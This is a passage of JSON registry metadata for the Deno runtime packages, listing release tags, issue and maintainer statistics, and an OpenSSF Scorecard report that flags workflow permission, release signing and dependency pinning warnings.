1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T11:44:11.695Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":58.51358846367166,"stargazers_count":0.0,"forks_count":0.07395082270290257,"average":14.646884821593641},"purl":"pkg:deno/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/deno/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/deno/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/deno/deno/dependencies","status":"removed","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/codemeta","maintainers":[],"registry":{"name":"deno.land","url":"https://deno.land","ecosystem":"deno","default":true,"packages_count":5909,"maintainers_count":0,"namespaces_count":0,"keywords_count":3978,"github":"denoland","metadata":{"funded_packages_count":870},"icon_url":"https://github.com/denoland.png","created_at":"2022-04-20T15:35:43.723Z","updated_at":"2026-09-04T05:06:21.394Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/namespaces"}},{"id":5151451,"name":"deno_node","ecosystem":"cargo","description":"Node compatibility for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":198,"first_release_published_at":"2022-08-11T18:54:14.561Z","latest_release_published_at":"2026-08-27T15:21:34.257Z","latest_release_number":"0.196.0","last_synced_at":"2026-09-08T09:13:20.888Z","created_at":"2022-08-11T19:03:03.772Z","updated_at":"2026-09-08T09:13:20.888Z","registry_url":"https://crates.io/crates/deno_node/","install_command":"cargo install deno_node","documentation_url":"https://docs.rs/deno_node/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not 